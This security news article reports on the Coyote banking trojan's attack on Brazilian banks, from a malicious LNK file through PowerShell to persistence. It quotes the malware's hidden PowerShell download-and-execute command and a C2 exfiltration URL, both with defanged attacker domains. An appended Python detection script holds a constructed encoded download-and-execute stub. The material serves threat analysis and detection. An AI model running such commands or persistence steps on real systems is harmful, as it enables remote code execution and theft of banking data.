Coyote Banking Malware Weaponizing Windows LNK Files To Execute Malicious Scripts


A new wave of cyberattacks leveraging the Coyote Banking Trojan has been identified, targeting financial institutions in Brazil.

This sophisticated malware employs malicious Windows LNK (shortcut) files as an entry point to execute PowerShell scripts, enabling multi-stage infection chains that end in data theft and system compromise.

The attack begins with a malicious LNK file that executes a stealthy PowerShell command.

This command connects to a remote server to download additional payloads. The initial PowerShell command line is as follows:

-w hid -noni -ep Bypass -c "Start-Job -Name PSSGR -ScriptBlock { IEX (iwr -Uri 'hxxps://tbet[.]geontrigame[.]com/zxchzzmism' -UseBasicParsing).Content }; Start-Sleep 131."

Fortinet researchers noted that this script initiates the download of encoded shellcode, which is decoded and executed to load the next stage of the attack.

Attack chain (Source – Fortinet)

Attack Process

  1. LNK File Exploitation: The shortcut file is crafted to include malicious arguments in its “Target” field. Upon execution, it triggers the embedded PowerShell script.
  • Example Target Path: cmd.exe /c powershell.exe -ExecutionPolicy Bypass -File malicious.ps1
LNK file (Source – Fortinet)
  2. Payload Delivery: The downloaded script decodes two embedded data segments and injects them into memory using Windows API functions such as VirtualAllocEx and WriteProcessMemory. This process is facilitated by a loader DLL (bmwiMcDec), which uses CreateRemoteThread to execute the injected code.
  3. Persistence Mechanism: The malware modifies the Windows Registry at:
   HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

It creates a new entry with a randomized name pointing to a Base64-encoded PowerShell command for subsequent payload execution.

  4. Command and Control (C2) Communication: Coyote establishes secure communication with its C2 servers over SSL. It transmits system information, including machine name, username, and antivirus details, encoded in Base64 and reversed for obfuscation. Example URL:
   hxxps://yezh[.]geontrigame[.]com/hqizjs/?I=y4CMuADfvJHUgATMgM3dvRmbpdFIOZ2bz9mcjlWT8JXZk5WZmVGRgM3dvRmbpdFfzImcoNEfOIDROUI

The malware offers a multitude of capabilities, including keylogging and screenshot capture, displaying phishing overlays that mimic banking interfaces, terminating processes and shutting down the system, and blocking user access with deceptive messages such as “Working on updates.”

Coyote employs modern programming tools like Nim and Node.js, enhancing its stealth and complexity.

The malware uses DLL side-loading via legitimate executables (obs-browser-page.exe) to evade detection.

Additionally, it leverages the Squirrel installer framework for distribution, disguising itself as a legitimate update package.

Coyote primarily targets over 70 Brazilian financial institutions and cryptocurrency platforms.

It monitors active windows for specific banking applications or websites, initiating malicious actions when detected.

To protect against such threats, avoid opening unsolicited LNK files and ensure antivirus software is regularly updated with signatures capable of detecting threats like LNK/Agent.D!tr.

Monitoring registry changes for unauthorized entries helps detect suspicious activity, while implementing endpoint detection tools enables the analysis of PowerShell activity for potential threats.
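The Run-key persistence described above (a randomized value name pointing to an encoded PowerShell command) and the detection advice in this paragraph can be combined into a small triage check. The following is an added example, not code from the article or from Fortinet: it inspects Run-key command lines for the launch flags seen in the LNK stub, decodes any -EncodedCommand argument, and flags a download-and-execute payload. The registry values are constructed samples; the placeholder URL and value names are invented.

```python
import base64
import re

# Constructed sample values for the HKCU ...\Run key (not taken from the article).
# The first mimics the persistence pattern described: a random-looking name whose
# value is an encoded PowerShell download-and-execute stub; the second is benign.
_STUB = "IEX (iwr -Uri 'http://placeholder.invalid/stage2' -UseBasicParsing).Content"
SAMPLE_RUN_VALUES = {
    "Xk3pq9LzQ": "powershell.exe -w hid -noni -ep Bypass -enc "
                 + base64.b64encode(_STUB.encode("utf-16-le")).decode(),
    "OneDrive": r'"C:\Users\u\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
}

# Launch flags the article's LNK stub uses (PowerShell accepts these abbreviations).
FLAG_PATTERNS = [
    ("hidden window", r"-w(?:indowstyle)?\s+hid(?:den)?"),
    ("non-interactive", r"-noni(?:nteractive)?"),
    ("execution policy bypass", r"-e(?:p|xecutionpolicy)\s+bypass"),
]
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

def decode_encoded_command(cmdline):
    """Return the UTF-16LE plaintext of a -EncodedCommand argument, or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def assess_run_value(cmdline):
    """Return a list of findings for one Run-key command line (empty = nothing odd)."""
    if not re.search(r"powershell|pwsh", cmdline, re.I):
        return []
    findings = [label for label, pat in FLAG_PATTERNS if re.search(pat, cmdline, re.I)]
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("encoded command")
        # Download-and-execute idiom: IEX over the content of a web request.
        if re.search(r"\b(iex|invoke-expression)\b", decoded, re.I) and \
           re.search(r"\b(iwr|invoke-webrequest|downloadstring)\b", decoded, re.I):
            findings.append("decoded payload downloads and executes a remote script")
    return findings

def scan(run_values):
    """Map each Run-key value name to its findings, keeping only flagged entries."""
    return {name: f for name, cmd in run_values.items() if (f := assess_run_value(cmd))}
```

On a live Windows host the same `scan` can be fed the values enumerated from the key with the standard `winreg` module; the heuristics are intentionally narrow, so a hit is a triage lead rather than a verdict.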
